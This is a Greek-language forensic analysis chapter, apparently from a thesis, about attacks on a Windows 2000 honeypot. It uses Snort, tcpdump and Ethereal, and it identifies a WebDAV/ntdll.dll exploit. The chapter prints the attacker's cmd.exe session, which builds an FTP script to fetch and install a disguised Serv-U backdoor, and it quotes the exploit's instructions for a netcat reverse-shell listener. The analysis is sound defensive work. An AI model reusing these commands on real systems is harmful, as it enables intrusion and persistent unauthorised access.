Κεφάλαιο 4. Μελέτη περίπτωσης κατάληψης ενός Windows honeypot

Μέγεθος: px
Εμφάνιση ξεκινά από τη σελίδα:

Download "Κεφάλαιο 4. Μελέτη περίπτωσης κατάληψης ενός Windows honeypot"

Transcript

1 Μελέτη περίπτωσης κατάληψης ενός Windows honeypot

2 Σελίδα 2 -

3 4. Μελέτη περιπτώσεων κατάληψης ενός windows honeypot Σε αυτό το κεφάλαιο θα μελετήσουμε πραγματικές επιθέσεις που πραγματοποιήθηκαν προς το Ελληνικό Honeynet και ήταν κατά κύριο λόγο επιτυχημένες. Θα δούμε τον τρόπο που ανακαλύπτουμε ότι πραγματοποιήθηκαν επιθέσεις, το exploit που χρησιμοποιήθηκε κάθε φορά, τα εργαλεία που χρησιμοποίησαν οι επιτιθέμενοι για την κατάληψη και τον έλεγχο ενός από τα honeypots, αλλά και τα εργαλεία που χρησιμοποιήσαμε εμείς για να κάνουμε την ανάλυση. Επίσης, θα δούμε τις κινήσεις των blackhat αφού έχουν αποκτήσει, ή νομίζουν ότι έχουν αποκτήσει, τον ολοκληρωτικό έλεγχο του honeypot. 4.1 Πρώτη Περίπτωση Στην πρώτη περίπτωση, θα δούμε πώς ένας επιτιθέμενος κατάφερε να εισχωρήσει στο windows honeypot του honeynet, και να φορτώσει τα κατάλληλα εργαλεία ώστε να πάρει τον έλεγχο του μηχανήματος και να μπορεί να το διαχειρίζεται απομακρυσμένα Παρακολούθηση του honeynet ενδείξεις επίθεσης Αρχικά Βλέποντας τα logs του snort (snort_fast) πίνακας 4-1, στην γραμμή 1, παρατηρούμε τις IP και να επιχειρούν attack (επίθεση) στην πόρτα 80 του IIS όπως φαίνεται στην γραμμή 1 (WEB-IIS ISAPI.ida attempt). Το μήνυμα αυτό μπορούμε να το βρούμε στο CVE (http://cve.mitre.org/cgi-bin/cvename.cgi?name=can ) με την εξής περιγραφή: IIS 4.0 allows a remote attacker to obtain the real pathname of the document root by requesting non-existent files with.ida or.idq extensions. Στην γραμμή 2 μας προειδοποιεί για προσπάθεια να εκτελέσει το cmd.exe. Το cmd.exe των Windows, είναι ένα εργαλείο, αντίστοιχο του shell του Unix, το οποίο δίνει την δυνατότητα να εκτελούνται DOS εντολές στα Windows, δηλαδή δίνει μια οθόνη εντολών (command line). Άρα αποκτώντας κάποιος command line, θα μπορεί να εκτελεί εντολές στο απομακρυσμένο σύστημα. Σελίδα 3 -

4 Αυτές οι κινήσεις όμως μας είναι γνωστές από το worm coderedii (βλέπε κεφάλαιο 3), το οποίο χρησιμοποιεί την ευπάθεια του IIS, Buffer Overflow In IIS Indexing Service DLL όπως την ονομάζει το cert.org. Δεν υπάρχει όμως ιδιαίτερος λόγος ανησυχίας αφού το worm μολύνει μηχανήματα με λειτουργικά συστήματα windows NT/2000. Στην περίπτωση μας, επιδιώκει να πάρει command line από τον dias ( ) αλλά αυτό το μηχάνημα τρέχει linux 7.3 οπότε το cmd.exe δεν είναι δυνατόν να εκτελεστεί. Snort_fast: 1.05/17-17:54: [**] [1:1243:6] WEB-IIS ISAPI.ida attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} :1993 -> : /17-17:54: [**] [1:1002:5] WEB-IIS cmd.exe access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} :1993 -> : /17-18:46: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:46: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:47: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:47: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:47: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:47: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:47: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:47: [**] [1:1070:5] WEB-MISC webdav search access [**] [Classification: access to a potentially vulnerable web ap 4lacation] [Priority: 2] {TCP} : > : /17-18:50: [**] [1:402:4] ICMP Destination Unreachable (Port Unreachable) [**] [Classification: Misc activity] [Priority : 3] {ICMP} > Πίνακας 4-1 Σελίδα 4 -

5 Αντιθέτως όμως η IP όπως βλέπουμε στις γραμμές 3,4,5,6,7,8,9,10 και 11 απευθύνεται στην port 80 του IIS (WEB-MISC webdav search access) στο Windows 2000 honeypot με IP Προσδιορισμός της επίθεσης και της εκμεταλλευόμενης αδυναμίας Χρησιμοποιώντας το ethereal, για να διαβάσουμε το binary και σχετίζοντάς το με τα alerts από το IDS (snort) που είδαμε νωρίτερα, παρατηρούμε ότι ο επιτιθέμενος ( ) κάνει μια αίτηση Search προς WebDAV IIS (Πίνακας 4-1, γραμμή 4) πιθανώς για να αναγνωρίσει αν το μηχάνημα θύμα υποστηρίζει WebDAV εντολές. Σελίδα 5 -

6 Εικόνα 4-1 Στην συνέχεια, ακολουθεί και άλλη αίτηση Search με μια σειρά από χαρακτήρες \020 (εικόνα 4-1, γραμμή 11). Ακολουθώντας το TCP Stream από επιλογή που μας δίνει το ethereal, βλέπουμε ότι στέλνει μεγάλο πλήθος από bytes με σκοπό το buffer overflow όπως φαίνεται στην Εικόνα 4-2. Εικόνα 4-2 Αναζητώντας πληροφορίες για το alert που μας δίνει το snort (WEB-MISC webdav search access), και συμπληρώνοντάς με τα δεδομένα από το ethereal προσπαθούμε να εντοπίσουμε τον τύπο της επίθεσης. Πληροφορίες για αυτό το alert μπορούμε να βρούμε : γενικά μας περιγράφει τα εξής: Σελίδα 6 -

7 This event indicates that a remote user has attempted to use the SEARCH directive to retreive a list of directories on the web server. This may allow an attacker to gain knowledge about the web server that could be useful in an attack Αλλά όπως είδαμε και στο κεφάλαιο 3 (WebDAV Attack σελ. 60) υπάρχει δυνατότητα για εκμετάλλευση ευπάθειας της βιβλιοθήκης ntdll.dll των windows σε συνδυασμό με ελλιπή ελέγχους του WebDAV, με σκοπό εκτέλεση εντολών απομακρυσμένα, με δικαιώματα του τοπικού μηχανήματος. Συμπεραίνουμε ότι δεν πρόκειται για μια αναγνωριστική κίνηση Η εξέλιξη της επίθεσης Συνεχίζοντας θα πρέπει να εντοπίσουμε και να μελετήσουμε τις συνδέσεις από τις οποίες θα ανακαλύψουμε κινήσεις που έκανε ο επιτιθέμενος, αλλά και εργαλεία που χρησιμοποίησε Εντοπισμός σχετιζόμενης δικτυακής κίνησης Μια τεχνική για να αποκαλύψουμε τις συνδέσεις που πραγματοποιήθηκαν μέσα από ένα binary αρχείο είναι να εντοπίσουμε τα SYN-ACK πακέτα, δηλαδή τις απαντήσεις που δόθηκαν σε αιτήσεις σύνδεσης, για ολοκλήρωση των συνδέσεων αυτών. Το εργαλείο που χρησιμοποιήθηκε για να απομονώσουμε τα πακέτα από το binary αρχείο είναι το tcpdump και εκτελέστηκε με παραμέτρους : /usr/sbin/tcpdump -r snort.log vv -n net and 'tcp[13] & 2 == 2' Παράμετροι:. -vv Εμφάνιση επιπρόσθετων πληροφοριών -r Διάβασε το αρχείο που ακολουθεί - n μην μεταφραστεί η IP σε όνομα DNS (do not resolve) net η IP που ακολουθεί περιγράφει ένα δίκτυο και όχι μόνο έναν host. tcp[13] & 2 == 2 εδώ κοιτάμε αν στην 13η οκτάδα από bits, δηλαδή το πεδίο flags του header (αποτελείται από 20 οκτάδες) εφαρμόσουμε λογικό AND με 2, επιστρέψει 2. Τότε έχουμε ένα πακέτο SYN-ACK. Παρακολουθώντας λοιπόν τα SYN-ACK πακέτα για την συγκεκριμένη IP, παρατηρούμε μία κίνηση που θα ενισχύσει την υποψία μας, ότι πρόκειται για προσπάθεια επίτευξης Buffer Overflow με σκοπό την απόκτηση command line, διότι βλέπουμε ότι μετά από τέσσερις Σελίδα 7 -

8 προσπάθειες επίθεσης στον IIS, Port 80, το honeypot κάνει αίτηση σύνδεσης (SYN) στον επιτιθέμενο. 17:46: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15298, len 52) 17:46: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15301, len 52) 17:47: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15393, len 52) 17:47: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15396, len 52) 17:47: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15490, len 52) 17:47: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15493, len 52) 17:47: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15585, len 52) 17:47: http > : S [tcp sum ok] : (0) ack win <mss 1460,nop,wscale 0,nop,nop,sackOK> (DF) (ttl 128, id 15588, len 52) 17:47: > : S [tcp sum ok] : (0) ack win <mss 1360,nop,nop,sackOK> (DF) [tos 0x80] (ttl 49, id 8097, len 48) Πίνακας 4-2 Στον πίνακας 4-2 βλέπουμε τα τέσσερα SYN-ACK πακέτα που στάλθηκαν σαν απάντηση από το honeypot μαρκαρισμένα με _ ώσπου ένα SYN-ACK γίνεται από τον επιτιθέμενο (μαρκαρισμένο με _), που σημαίνει ότι απαντάει σε κάποια αίτηση SYN που κάνει το Honeypot προς τον επιτιθέμενο. Σελίδα 8 -

9 Το τελευταίο SYN-ACK που φαίνεται στον πίνακα 4-2 γίνεται από την IP , δηλαδή η αίτηση (SYN) έχει γίνει από το honeypot στην πόρτα Αυτό σημαίνει ότι κατά πάσα πιθανότητα η επίθεση πέτυχε και ο BlackHat έχει command line πρόσβαση στο honeypot. Από αυτές τις οκτώ πρώτες απαντήσεις (SYN-ACK) του honeypot, βλέποντας τα δεδομένα ανακαλύπτουμε ότι σε τέσσερις συνδέσεις από αυτές στέλνονται HTTP πακέτα στην πόρτα 80 του honeypot από τις πόρτες 13494, 11164, και του με εντολές SEARCH /\20\20\20., SEARCH /\21\21\21., SEARCH /\22\22\22., SEARCH /\23\23\23. όπου στο τελευταίο Search πιθανότατα πετυχαίνει και το overflow, διότι όπως φαίνεται από τη δικτυακή κίνηση στο ethereal, μετά από την επίθεση στην πόρτα 80 του honeypot, έχουμε αμέσως SYN πακέτο από το honeypot προς την πόρτα Μπορούμε να δούμε πώς ξεκινάει το πρώτο SEARCH στην Εικόνα 4-1 από γραμμή 11 και έπειτα. Εικόνα 4-3 Σελίδα 9 -

10 Οι κινήσεις του BlackHat Με την χρήση της επιλογής follow TCP stream του ethereal, μπορούμε να πάρουμε το ASCII φορτίο της σύνδεσης του επιτιθέμενου στην πόρτα Βλέποντας τα αποτελέσματα του Follow TCP stream (πίνακας 4-3α), μπορούμε ξεκάθαρα να εντοπίσουμε τις κινήσεις που υλοποίησε o Black Hat, για να εκμεταλλευόμενος την πρόσβαση που επιβεβαιώνουμε ότι τελικά απέκτησε. Microsoft Windows 2000 [Version ] (C) Copyright Microsoft Corp. 1. C:\WINNT\system32> 2. C:\WINNT\system32>echo open >> c:\apis.txt echo open >> c:\apis.txt 3. C:\WINNT\system32>echo user hack >> c:\apis.txt echo user hack >> c:\apis.txt 4. C:\WINNT\system32>echo hack >> c:\apis.txt echo hack >> c:\apis.txt 5. C:\WINNT\system32>echo ascii >> c:\apis.txt echo ascii >> c:\apis.txt 6. C:\WINNT\system32>echo get ServUDaemon.ini c:\winnt\config\servudaemon.ini >> c:\apis.txt echo get ServUDaemon.ini c:\winnt\config\servudaemon.ini >> c:\apis.txt Σελίδα 10 -

11 7. C:\WINNT\system32>echo bin >> c:\apis.txt echo bin >> c:\apis.txt 8. C:\WINNT\system32>echo get winsecure.exe c:\winnt\config\winsecure.exe >> c:\apis.txt echo get winsecure.exe c:\winnt\config\winsecure.exe >> c:\apis.txt 9. C:\WINNT\system32>echo quit >> c:\apis.txt echo quit >> c:\apis.txt 10. C:\WINNT\system32>ftp -i -v -n -s:c:\apis.txt ftp -i -v -n -s:c:\apis.txt Connected to open RealD's server user hack 331 Password required for hack. 230 User hack logged in. Invalid command. ascii 200 Type set to A. get ServUDaemon.ini c:\winnt\config\servudaemon.ini 200 Port command successful. 150 Opening data connection for ServUDaemon.ini (355 bytes). 226 Transfer ok ftp: 355 bytes received in 0,05Seconds 7,10Kbytes/sec. bin 200 Type set to I. get winsecure.exe c:\winnt\config\winsecure.exe 200 Port command successful. 150 Opening data connection for winsecure.exe ( bytes). 226 Transfer ok ftp: bytes received in 9,98Seconds 49,76Kbytes/sec. quit 221 Bye bye... Σελίδα 11 -

12 11. C:\WINNT\system32>cd.. cd C:\WINNT>cd config cd config 13. C:\WINNT\Config>winsecure /i winsecure /i 14. C:\WINNT\Config>net start serv-u net start serv-u The service name is invalid. More help is available by typing NET HELPMSG C:\WINNT\Config>winsecure /i winsecure /i 16. C:\WINNT\Config>net start serv-u net start serv-u The Serv-U FTP Server service was started successfully. 17. C:\WINNT\Config>dir dir Volume in drive C has no label. Volume Serial Number is 789F-0403 Directory of C:\WINNT\Config 17/05/ :49p <DIR>. 17/05/ :49p <DIR>.. 07/12/ :00a 654 general.idf 07/12/ :00a 658 hindered.idf 07/12/ :00a 302 msadlib.idf Σελίδα 12 -

13 17/05/ :49p 370 servudaemon.ini 17/05/ :49p 529 ServUStartUpLog.txt 17/05/ :49p 6 File(s) winsecure.exe bytes 2 Dir(s) bytes free Πίνακας 4-3α Με λίγα λόγια, στον πίνακα 4-3α βήματα 2 έως και 9, Βλέπουμε ότι δημιουργεί με την εντολή echo ένα text αρχείο με όνομα c:\apis.txt, το οποίο περιέχει τα εξής : open user hack hack ascii servudaemon.ini bin get winsecure.exe quit Στην συνέχεια εκτελώντας την εντολή C:\WINNT\system32>ftp -i -v -n -s:c:\apis.txt (Βήμα 10), εκτελεί ftp με τις εντολές που αναγράφονται στο αρχείο. Δηλαδή συνδέεται με τον εαυτό του ( ) με user name hack και Password hack, κατεβάζει το αρχείο serverudaemon.ini σε ascii Mode και το winsecure.exe σε binary mode, και κλείνει την ftp σύνδεση με quit. Τo αρχείο winsecure.exe είναι το serverudaemon.exe μετονομασμένο το οποίο είναι ένας ftp server (http://www.serv-u.com/). Το serverudaemon.ini είναι το αρχείο που περιέχει τις ρυθμίσεις για αυτόν τον ftp server Πληροφορίες για τα εργαλεία του επιτιθέμενου Για να εντοπίσουμε το SESSION που περιέχει το serverudaemon.ini ακολουθήσαμε την εξής διαδικασία: Σελίδα 13 -

14 1. Ελέγχουμε το κατάλογο που αποθηκεύονται τα SESSIONS του honeypot ( ) από το Snort, δηλαδή στον κατάλογο πίνακας 4-4 drwx May 17 23: drwx May 17 23: drwx May 18 00: drwx May 18 00: drwx May 17 21: drwx May 17 19: drwx May 17 20: drwx May 17 13: drwx May 17 15: drwx May 17 08: drwx May 17 18: drwx Oct 31 10: rw May 17 23:17 snort_fast -rw May 17 23:17 snort_full -rw May 18 00:05 snort.log rw-r--r May 18 00:05 snort.log md5 Πίνακας Παρατηρούμε ότι υπάρχουν sessions με πόρτα προορισμού 21 (πόρτα ελέγχου του ftp) πίνακας 4-5, αφού πραγματοποίησε ftp σύνδεση θα χρησιμοποίησε την πόρτα 21 -rw May 17 20:01 SESSION:0-0 -rw May 17 20:08 SESSION: rw May 17 18:49 SESSION: rw May 17 18:50 SESSION: rw May 17 19:37 SESSION: rw May 17 20:13 SESSION: rw May 18 00:04 SESSION: rw May 18 00:01 SESSION: rw May 17 23:01 SESSION: rw May 17 20:22 SESSION: Σελίδα 14 -

15 Πίνακας 4-5 Ελέγχοντας το SESSION: , Πίνακας 4-6, βλέπουμε τι έγινε αφού εκτελέστηκε η εντολή C:\WINNT\system32>ftp -i -v -n -s:c:\apis.txt Από τις γραμμές : PORT 192,168,0,2,4,57 RETR ServUDaemon.ini Μπορούμε να εντοπίσουμε το SESSION αυτό, που περιέχει το περιεχόμενο του ServerUDaemon.ini. Με την εντολή PORT ορίζουμε την IP και την πόρτα που θα συνδεθεί ο Server. To πλήθος και την σημασία όλων των FTP εντολών, μπορούμε να βρούμε στο Με την σύνταξη PORT a1,a2,a3,a4,p1,p2 η IP address του server ορίζεται a1.a2.a3.a4, και η πόρτα p1*256+p2. Στην περίπτωση μας IP port 4* = RealD's server USER hack 331 Password required for hack. PASS hack 230 User hack logged in. TYPE A 220 RealD's server USER hack 331 Password required for hack. PASS hack 230 User hack logged in. TYPE A 200 Type set to A. PORT 192,168,0,2,4, Port command successful. RETR ServUDaemon.ini 150 Opening data connection for ServUDaemon.ini (355 bytes). 226 Transfer ok TYPE I 200 Type set to I. Σελίδα 15 -

16 PORT 192,168,0,2,4, Port command successful. RETR winsecure.exe 150 Opening data connection for winsecure.exe ( bytes). 226 Transfer ok QUIT Πίνακας Έτσι ελέγχοντας τον κατάλογο βρίσκουμε το SESSION: που έχει καταγράψει τα περιεχόμενα του ServerUDaemon.ini, Πίνακας 4-7. Αυτό που μπορούμε να παρατηρήσουμε στο εξαγόμενο αρχείο είναι ότι το.ini αρχείο είναι ρυθμισμένο για να ανοίγει ο serverudaemon.exe την πόρτα 1337 για ftp Control, και ότι υπάρχουν 2 χρήστες : TmZ και Domo. [GLOBAL] Version= RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doX JsgW64YIyPdo+wAGnUBuycB [DOMAINS] Domain1= st 1 0 [Domain1] User1=TmZ 1 0 User2=Domo 1 0 [USER=TmZ 1] Password=pi15ACAD8B24F5C C5D3C42D HomeDir=c:\ Πίνακας 4-7 O BlackHat εγκαθιστά τον serverudaemon σαν service, εκτελώντας την εντολή C:\WINNT\Config>winsecure /i (Πίνακας 4-3α βήμα 15) Σελίδα 16 -

17 Και θέτει σε λειτουργία το services με την εντολή: C:\WINNT\Config>net start serv-u (Πίνακας 4-3α βήμα 16) 18. C:\WINNT\Config>d: d: The device is not ready. 19. C:\WINNT\Config>dir dir Volume in drive C has no label. Volume Serial Number is 789F-0403 Directory of C:\WINNT\Config 17/05/ :49p <DIR>. 17/05/ :49p <DIR>.. 07/12/ :00a 654 general.idf 07/12/ :00a 658 hindered.idf 07/12/ :00a 302 msadlib.idf 17/05/ :49p 370 servudaemon.ini 17/05/ :49p 529 ServUStartUpLog.txt 17/05/ :49p 6 File(s) winsecure.exe bytes 2 Dir(s) bytes free Πίνακας 4-3β Μετά από την εκτέλεση των παραπάνω εντολών, το honeypot τρέχει ftp server που ακούει στην πόρτα Σελίδα 17 -

18 20. C:\WINNT\Config>d: d: The device is not ready. 21. C:\WINNT\Config>e: e: The system cannot find the drive specified. 22. C:\WINNT\Config>f: f: The system cannot find the drive specified. 23. C:\WINNT\Config>g: g: The system cannot find the drive specified. 24. C:\WINNT\Config>dir dir Volume in drive C has no label. Volume Serial Number is 789F-0403 Directory of C:\WINNT\Config 17/05/ :49p <DIR>. 17/05/ :49p <DIR>.. 07/12/ :00a 654 general.idf 07/12/ :00a 658 hindered.idf 07/12/ :00a 302 msadlib.idf 17/05/ :49p 370 servudaemon.ini 17/05/ :49p 529 ServUStartUpLog.txt 17/05/ :49p 6 File(s) winsecure.exe bytes 2 Dir(s) bytes free 25. C:\WINNT\Config>exit exit Πίνακας 4-3γ Σελίδα 18 -

19 Τέλος ελέγχει αν υπάρχουν άλλοι δίσκοι, και για d:, e:, f: και g:, πίνακας 4-3 β, πίνακας 43γ βήμα 20 έως και 23 και τερματίζει την σύνδεση του. Ο blackhat τώρα συνδέεται στον ftp server που ενεργοποίησε στην πόρτα 1337 (Πίνακας 4-8). Σε αυτό το SESSION βλέπουμε ότι συνδέθηκε με τον ftp server που εγκατέστησε στο honeypot σαν User TmZ με Password Admin όπως φαίνεται στον παρακάτω πίνακα 4-8, κατά την σύνδεση με τον ftp server φαίνεται ότι ο χρήστης TmZ εκτελεί εντολές διαχείρισης 220 Serv-U FTP Server v3.0 for WinSock ready... AUTH M 530 Not logged in. USER TmZ 331 User name okay, need password. PASS Admin 230 User logged in, proceed. SITE MAINTENANCE 230-Switching to SYSTEM MAINTENANCE mode Version= RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJs gw64yiypdo+wagnubuycb 900-User=peterson 900-Reseller= 900-Time= Type=1 900-Size=1 900-Days= MajorVersion=3 900 MinorVersion=0 GETDOMAINLIST 200 Domain=st GETSTATUSINFO 200 Info=TMZ : SITE MAINTENANCE c:\ Σελίδα 19 -

20 GETUSERINFO 200 Info=TMZ : SITE MAINTENANCE c:\ Πίνακας Πληροφορίες για την πηγή της επίθεσης. Καθώς συλλέγουμε στοιχεία για την επίθεση, είναι χρήσιμο να αναζητήσουμε μερικές πληροφορίες για την μηχανή που ξεκινάει η επίθεση. Ενδιαφέρον πληροφορία είναι, ποια είναι η φυσική θέση αυτής της IP που επιτίθεται. Μπορούμε να μάθουμε την χώρα προέλευσης της IP, τον οργανισμό που έχει δεσμεύσει κάποιο σύνολο από IP δίκτυα και εκεί ανήκει η IP διεύθυνση του επιτιθέμενου, ακόμα μπορούμε να καταλάβουμε αν είναι Dial up σύνδεσή ή μια από τις κύριες μηχανές του οργανισμού. Αυτήν την πληροφορία μπορούμε να την πάρουμε, χρησιμοποιώντας το windows πρόγραμμα Cyber Kit, το οποίο διαθέτει εργαλείο whois, μπορούμε να βρούμε σε ποιό δίκτυο και οργανισμό ανήκει η συγκεκριμένη IP. Εμείς επιλέγουμε τον whois server, που περιέχει την βάση δεδομένων με τις πληροφορίες των δικτύων των οργανισμών και πληκτρολογούμε την IP που θέλουμε να δούμε που ανήκει. Οι whois servers που χρησιμοποιούνται για να καλύψουμε σχεδόν όλες τις χώρες είναι: whois.ripe.net, whois.iana.org, whois.arin.net, whois.apnic.net, whois.lacnic.net Στην περίπτωση μας η ip προέρχεται από Ολλανδία και πρόκειται για κάποιον χρήστη ευριζωνικής σύνδεσης, όπως μπορούμε να καταλάβουμε από τα πεδία netname και descry. Δεν μπορούμε βέβαια να εξακριβώσουμε εάν ο χρήστης εξαπόλυσε την επίθεση από αυτή την μηχανή ή χρησιμοποιείται από έναν blackhat που την έχει καταλάβει νωρίτερα. netnum: netname: CISBRD-CUST-DHCP-NET4 descr: Cistron Broadband BV country: NL Σελίδα 20 -

21 Εικόνα 4-4 Επίσης μπορούμε να χρησιμοποιήσουμε το whois εργαλείο του linux. Είναι το γνωστό εργαλείο που υπάρχει εξορισμού στα unix συστήματα και στέλνει ερώτηση στους whois servers, για να πάρει τα ίδια αποτελέσματα με το αντίστοιχο εργαλείο των windows που είδαμε παραπάνω. Συνοπτικές πληροφορίες από το manual του linux whois: WHOIS(1) NAME whois, fwhois - query a whois or nicname database SYNOPSIS whois [-v] [-r -n] [-h server] [-p port] [-t timeout] [--] Σελίδα 21 -

22 DESCRIPTION whois formats and sends queries to any RFC954 whois server and prints the results to standard output Αναγνώριση του Exploit που Χρησιμοποιήθηκε Αναζητώντας στο WEB για webdav vulnerabilities (http://www.securityfocus.com/bid/2483 ) ανακαλύπτουμε ότι υπάρχει ένα vulnerabilityγια webdav/ntdll.dll overflow στον IIS. Επίσης βρήκαμε ένα exploit σε γλώσσα προγραμματισμού C, το οποίο πολύ πιθανόν να χρησιμοποιήθηκε από τον blackhat. Ας δούμε λοιπόν τι έγινε. Όπως προαναφέραμε το πιθανότερο exploit που χρησιμοποιήθηκε, λειτουργεί όπως το C πρόγραμμα που βρίσκεται στην ηλεκτρονική διεύθυνση Παρακάτω (Πίνακας 4-9) Βλέπουμε τα σχόλια που υπάρχουν στην αρχή του exploit : /*******************************************************************/ /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */ /* */ /* this is the exploit for ntdll.dll through WebDAV. */ /* run a netcat ex: nc -L -vv -p 666 /* wb server.com your_ip */ /* the shellcode is a reverse remote shell */ /* you need to pad a bit.. the best way I think is launching */ /* the exploit with pad = 0 and after that, the server will be */ /* down for a couple of seconds, now retry with pad at 1 /* and so on..pad 2.. pad 3.. if you haven't the shell after */ /* something like pad at 10 I think you better to restart from */ /* pad at 0. On my local IIS the pad was at 1 (0x ) but */ /* on all the others servers it was at 2,3,4, etc..sometimes */ /* you can have the force with you, and get the shell in 1 try */ /* sometimes you need to pad more than 10 times ;) /* the shellcode was coded by myself, it is SEH + ScanMem to */ /* find the famous offsets (GetProcAddress).. /* I know I code like a pig, my english sucks, and my tech too */ */ */ */ */ Σελίδα 22 -

23 /* it is my first exploit..and my first shellcode..sorry :P */ /* if you have comments feel free to mail me at: /* mailto: /* or visit us at You can speak with us */ /* at IRC undernet channel #coromputer /* ok now the greetz: /* [El0d1e] to help me find some information about the bug :) */ /* tuck_ to support me ;) /* and all my friends in coromputer crew! hein les poulets! =) */ /* /* /* /* /* /* */ */ */ */ */ */ Tested by Rafael [RaFa] Nunez */ */ (take off the WSAStartup, change the closesocket, change */ headers and it will run on linux boxes ;pppppp ). */ */ /*******************************************************************/ Πίνακας 4-9 Αυτό το exploit, δημιουργεί ένα buffer overflow στον IIS και επιστρέφει shell σε κάποια πόρτα που έχει ανοιχτεί στον υπολογιστή του επιτιθέμενου. Περισσότερες πληροφορίες για buffer overflow, υπάρχουν στην πτυχιακή εργασία του Δημήτριου Πρίτσου, που υλοποιήθηκε στο Internet Systematics Lab του ΕΚΕΦΕ «Δημόκριτος», για το Τεχνολογικό Ινστιτούτο Αθηνών, με θέμα «Εντοπισμός επιθέσεων κακόβουλων χρηστών που βασίζονται σε αδυναμίες υπερχείλισης μνήμης (Buffer Overflow)» Για να ανοιχτεί μια Port στον client, όπως προτείνει και ο δημιουργός του exploit στα αρχικά σχόλια, χρησιμοποιείται το netcat (nc.exe) με παραμέτρους : Nc.exe L vv p <αριθμός πόρτας> Οπότε εκτελώντας το C πρόγραμμα με παραμέτρους : Σελίδα 23 -

24 Όνομα <target_ip> <Source_IP> <Port> <pad> Target_IP : H IP Διεύθυνση του θύματος Source_IP : H IP Διεύθυνση του επιτιθέμενου Port : H Port που θα ανοίξει για shell Pad : Πλήθος byte που θα σταλούν για να γεμίσουν (pad) τον buffer και να προκαλέσουν την υπερχείλιση. (τιμές 1, 2, 3...) Επιχειρείται, δηλαδή το exploit με την κατάλληλη τιμή pad ώστε να πετύχει η υπερχείλιση της μνήμης και να εκτελεστεί κώδικας στον υπολογιστή θύμα. Ο κώδικας αυτός θα δώσει στον επιτιθέμενο ένα shell του υπολογιστή θύμα. Δεύτερη περίπτωση exploit που μπορεί να χρησιμοποιήθηκε είναι σε γραφικό περιβάλλον, με την ίδια φιλοσοφία του πρώτου, μόνο που αντί να εκτελείται σε command line το exploit, τρέχει ένα GUI όπως φαίνεται παρακάτω. Να σημειωθεί ότι και εδώ γίνεται χρήση του netcat για να ανοίξει πόρτα διασύνδεσης από τον επιτιθέμενο. Σελίδα 24 -

25 4.2 Δεύτερη Περίπτωση Στην δεύτερη περίπτωση θα ακολουθήσουμε μια IP που χρησιμοποίησε διαφορετικά μέσα για να πετύχει τον στόχο της, από την πρώτη περίπτωση. Βέβαια θα ανακαλύψουμε ότι δεν υπάρχει μεγάλη διαφορά από την πρώτη στην πολιτική της επίθεσης, αλλά θα πάρουμε περισσότερα στοιχεία για τον τελικό σκοπό αυτών των επιθέσεων. Η επόμενη IP που θα ασχοληθούμε, όπως φαίνεται στον Πίνακα 4-10 στις γραμμές 13 έως και 23, είναι η Σελίδα 25 -

26 4.2.1 Ενδείξεις Επίθεσης Παρακολουθώντας τα alert που παράχθηκαν από το snort, θα δούμε κάποια δραστιριότητα προς το windows honeypot. Ας δούμε αναλυτικά τις κινήσεις που γίνανε: Πρώτα παρατηρούμε ότι κάνει Ping και μάλιστα μόνο στο windows 2000 honeypot, γραμμή 13,14,15 και 16. Ενώ στην συνέχεια κάνει επίθεση στον SQL server πίνακας 4-10 γραμμή 17 έως και 23. Από αυτή την πληροφορία μπορούμε να καταλάβουμε ότι ο επιτιθέμενος ήξερε ότι υπάρχει αυτός ο υπολογιστής στο δίκτυο με ανοιχτό SQL server πιθανότατα από προηγούμενο scan και για αυτό ήταν σε θέση να πραγματοποιήσει ένα ακριβές και αστραπιαίο χτύπημα. Το snort καταγράφει την επίθεση σαν MS-SQL xp_cmdshell - program execution (Πίνακας 10 Γραμμή 17-23). Σελίδα 26 -

